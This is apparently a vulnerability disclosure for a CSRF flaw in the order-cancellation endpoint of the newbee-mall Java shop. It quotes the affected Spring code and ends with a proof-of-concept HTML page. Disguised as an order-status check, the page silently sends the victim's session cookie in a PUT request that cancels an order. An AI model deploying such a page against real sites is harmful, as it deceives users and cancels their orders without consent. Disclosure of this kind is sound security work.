CSRF Vulnerability in Order Cancellation

[flashzyc]

CSRF Vulnerability in Order Cancellation

Summary

A CSRF vulnerability exists in the order cancellation endpoint /orders/{orderNo}/cancel. Attackers can force authenticated users to cancel their legitimate orders without authorization.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/orders/**");
        // ❌ No CSRF protection configured
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/OrderController.java (Lines 85-95)

@PutMapping("/orders/{orderNo}/cancel")
@ResponseBody
public Result cancelOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ orderNo is predictable (timestamp-based)
    String cancelOrderResult = newBeeMallOrderService.cancelOrder(orderNo, user.getUserId());
    if (ServiceResultEnum.SUCCESS.getResult().equals(cancelOrderResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(cancelOrderResult);
    }
}

Security Issues:

1. ❌ No CSRF token validation
2. ⚠️ Order numbers are predictable and can be enumerated
3. ⚠️ No additional confirmation required

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Order Status Update</title>
</head>
<body>
    <h2>Checking your recent orders...</h2>
    <div id="status">Please wait...</div>
    
    <script>
        // Target order number (can be enumerated or obtained from order history page)
        var orderNo = '202602051645001';  // Example order number
        
        fetch('http://localhost:28089/orders/' + orderNo + '/cancel', {
            method: 'PUT',
            credentials: 'include'  // Include session cookie
        })
        .then(response => response.json())
        .then(data => {
            document.getElementById('status').innerHTML = 'Update complete!';
        })
        .catch(err => {
            document.getElementById('status').innerHTML = 'Processing...';
        });
    </script>
</body>
</html>

Impact

Malicious order cancellation - Attackers can cancel users' legitimate orders, causing inconvenience and potential business disruption.

---

CVSS Score: 6.5 (Medium)